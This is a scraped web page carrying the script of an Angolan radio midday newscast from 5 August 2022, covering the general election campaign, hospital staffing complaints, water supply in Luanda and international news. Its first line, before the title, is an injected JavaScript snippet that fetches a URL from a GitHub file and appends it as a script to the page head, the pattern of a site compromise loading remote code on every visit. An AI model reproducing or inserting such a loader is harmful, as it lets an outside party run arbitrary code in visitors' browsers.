;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Notícias às 12 horas, edição de 05 de agosto de 2022 | RadioPlayDigital
Notícias às 12 horas, edição de 05 de agosto de 2022

ELEIÇÕES GERAIS EM ANGOLA, OBSERVADORES NACIONAIS JÁ ESTÃO CREDENCIADOS E CHEGAM HOJE AO PAÍS OBSERVADORES DA SADC

 

 

UNITA PODE CANCELAR ACTIVIDADE DE MASSA PREVISTA PARA AMANHÃ NA CAPITAL DO PAÍS, POR SUPOSTA INTIMIDAÇÃO.

 

 

SINDICATO DOS MÉDICOS DENUNCIA INEFICIENCIA DOS PROFISSIONAIS SELECIONADOS PARA OS NOVOS HOSPITAIS DE ESPECIALIDADES DO PAÍS POR FALTA DE FORMAÇÃO QUALIFICADA.

 

 

EPAL PROMETE RESOLVER PROBLEMAS DE ABASTECIMENTO DE ÁGUA EM ZONAS CRÍTICAS DA CAPITAL DO PAÍS QUE REGISTARAM DIFICULDADES DE ABASTECIMENTO NOS ÚLTIMOS DIAS.

 

 

ACTUALIDADE FORA DE PORTAS, RÚSSIA APELA A REAÇÃO FACE ÀS “VIOLAÇÕES” DOS EUA SOBRE O PRINCÍPIO DE SOBERANIA.

 

 

 

JINGLER ELEIÇÕES

 

 

Jornal da tarde da MFM, Sexta-feira 5 de agosto de 2022, suporte técnico de Mauro Fernandes, Coordenação de Alves Fernandes, edição de Romão de Jesus apresentação de Tony Fancy

 

 

JINGLER NOTÍCIAS

 

 

A faltarem 19 dias para os cidadãos maiores irem as urnas para escolherem os governantes que vão dirigir os próximos 5 anos, foram finalmente credenciados os observadores eleitorais nacionais para a devida fiscalização dos actos eleitorais para o pleito de 24 deste mês, estando previsto hoje ao país, a chegada de alguns dos observadores internacionais.

O Director executivo do Instituto Angolano de Sistema Eleitorais e Democracia e membro da coordenação do Observatório Eleitoral de Angola, Luís Jimbo, confirma o credenciamento de algumas instituições e avança que estão a ser criadas as condições para o trabalho dos observadores com vista a garantir a transparência dos processos eleitorais.

 

 

RD LUÍS JIMBO 1

 

 

Luís Jimbo diz não saber ao certo qual a situação referente ao credenciamento dos observadores internacionais.

 

 

RD LUÍS JIMBO 2

 

 

CNE Credencia observadores nacionais para a fiscalização dos actos eleitorais, está prevista a chegada hoje ao país alguns observadores internacionais.

 

 

PONTO UNITA

 

 

A UNITA pretende realizar uma actividade de massa amanhã aqui na capital do país, junto dos seus militantes amigos e simpatizantes no âmbito da capanha eleitoral que em princípio, parece estar prestes a ser cancelada por situações ainda por se esclarecer segundo avançou o porta-voz de campanha do galo negro, alcino Kuvalela. 

 

 

ALCINO KUVALELA 1

 

Alcino Kuvalela, denuncia ainda a tentativa de cancelamento da atividade do seu partido por forças ligadas ao partido governante. O Porta Voz de campanha do galo negro, diz ainda que o partuido não vai ceder a jogadas que promovam a instabilidade política no país.

 

 

ALCINO KUVALELA 2

 

 

UNITA denuncia tentativa de cancelamento da sua actividade massa prevista para amanhã na capital do país por forças ligadas ao MPLA

 

 

PONTO CASA-CE

 

 

E o presidente da Casa-CE Manuel Fernandes faz um balanço positivo do período de campanha eleitoral da coligação que dirige, frisando que apesar de algumas situações menos boas, o a sua força segue firme rumo ao pleito de 24 de agosto.

Manuel Fernandes que vai nas próximas horas manter um encontro com o eleitorado na província do MOXICO, diz que o seu partido está pronto para vencer pleito eleitoral que se avizinha.

 

 

MANUEL FERNANDES

 

Presidente DA CASA-CE Manuel Fernandes

 

 

PONTO FNLA

 

 

E o partido dos irmãos têm agendado para este final de semana várias actividades por todo o país com destaque a dois actos de massa a serem realizados aqui na capital prevista para este sábado e domingo como fez saber o porta voz de campanha Ndunda Nzinga

 

NDUNDA NZINGA

 

Partidos políticos e a sua agenda da campanha tendo em vista as eleições de 24 deste mês.

 

 

PONTOS ISENÇÃO NA NOTÍCIA

 

 

Os médicos afectos as novas unidades hospitalares de Luanda, nomeadamente o Hospital Cardio-pulmonar Cardeal dom Alexandre do Nascimento, e o Hospital Materno Infantil recentemente inaugurado estão a ser classificados por utentes como ineficientes por constantes dificuldades no manejamento dos recursos disponibilizados nestas unidades.

O Presidente do Sindicato da Ordem dos Médicos Adriano Manuel, diz que as dificuldades se dão por falta de coordenação no processo de indicação dos profissionais selecionados.

 

ADRIANO MANUEL 1

 

Adriano Manuel, diz ainda que as unidades hospitalares que foram contruídas por especialidades não satisfazem as reais necessidades dos cidadãos.

 

ADRIANO MANUEL 2

 

E a Bastonária da Ordem dos Enfermeiros Elisa Gaspar, diz não ser da responsabilidade da Ordem a má prestação dos profissionais e indica responsabilidades ao ministério da saúde.

 

ELISA GASPAR   

 

Médicos das novas unidades hospitalares apontados como ineficientes por dificuldades no manuseio dos recursos disponibilizados.

 

 

PONTO CORRIDO

 

 

O credenciamento dos profissionais da Comunicação Social para a cobertura das Eleições Gerais de 24 de Agosto de 2022 arranca, este sábado 6, no Centro de Imprensa Aníbal de Melo, em Luanda.

Segundo uma nota de imprensa do CIAM , a instituição refere que “em concertação com o Comissão Nacional Eleitoral, o credenciamento começa dia 6 início a partir das 8 horas”.

Para o efeito, diz o documento, os órgãos devem remeter com a maior “brevidade” a lista dos profissionais ao Centro de Imprensa Aníbal de Melo onde estará o posto da CNE para o respectivo credenciamento.

 

-.-

 

O Centro de Ciências de Luanda, em construção na baixa da capital angolana, pode abrir as portas ao público em Julho do próximo ano, anunciou nesta quinta-feira, o director do Gabinete de Obras Especiais Leonel Cruz.

A informação foi prestada durante uma visita que o Presidente da República, João Lourenço, realizou à empreitada, que está a ser instalada na antiga fábrica de sabão, no Largo do Baleizão.

Depois de retomada em finais de 2021, a obra tem um grau de execução de cerca de 50 por cento, ao mesmo tempo que decorre o processo de aquisição do acervo e equipamentos, entre os quais 230 módulos de exposição permanente e amovíveis.

O Centro de Ciências de Luanda tem como objectivo a divulgação do conhecimento científico, e contará com espaços para a divulgação da cultura, história, fauna angolana, bem como áreas de experimentação química, física, matemática e electricidade.

 

-.-

 

Dois jovens de 18 e 20 anos de idade foram detidos na quarta-feira, 03, no município de Namacunde, província do Cunene, acusados de furto de dísticos de duas assembleias de voto.

A informação foi dada à ANGOP pelo porta-voz da Polícia Nacional no Cunene, superintendente Nicolau Tuvecalela, realçando que os detidos são acusados de furto dos dísticos das assembleias de voto número 12.286 e 12.287 na escola 14, fronteira de Santa-Clara.

Segundo o oficial, os indivíduos foram detidos mediante denúncia anónima e encaminhados ao Ministério Público.

Dados da Comissão Provincial Eleitoral (CPE) indicam que a província do Cunene conta com 644 assembleias e 925 mesas de voto, para um universo de 430 mil e 899 eleitores registados.

 

 

PONTO

 

 

A EPAL, vai dar resposta às reclamações dos moradores do zango 5 mil, Estalagem Bairro 6 na zona dos mulenvos e o bairro Capalanga na rua da Universidade Piaget.

A garantia é do Porta-Voz da EPAL Waldemiro Bernardo, que avança as condições criadas para solucionar as dificuldades na centralidade do Zango 5 mil.

 

 

WALDEMIRO BERNARDO 1

 

 

Waldemiro Bernardo fala também das condições que estão a ser criadas para solucionar os mesmos problemas na zona da estalagem concretamente no bairro 6.

 

 

WALDEMIRO BERNARDO 2

 

 

O Porta Voz da EPAL anunciou ainda para breve a contrução de um centro de distribuição de água dependente de um sistema que poderá abrager várias família.

 

WALDEMIRO BERNARDO 3

 

 

EPAL vai nos próximos dias melhorar os serviços de abastecimento e distribuição de água em algumas zonas de Luanda.

 

 

INTERNACIONAL

 

O ministro dos Negócios Estrangeiros russo Sergey Lavrov apelou hoje a uma reação ao que chamou de violações do princípio de soberania pelos Estados Unidos, numa reunião com o homólogo chinês, Wang Yi.

O ministro russo acusou os EUA de tentarem “impor o seu domínio” em diferentes cantos do mundo, durante o encontro com Wang, que decorreu na capital do Camboja, Phnom Penh, à margem de uma reunião dos ministros dos Negócios Estrangeiros da Associação das Nações do Sudeste Asiático (ASEAN).

 

Segundo Lavrov, os EUA decidiram “transformar a Ucrânia numa ameaça à Federação Russa e ignoraram durante anos a política racista do regime de Kiev, que destruiu tudo o que era russo”

Data de Emissão: 05-08-2022 às 12:00
Género(s): Noticiário
 
PARTICIPANTES
PUB RADIO PLAY

Relacionados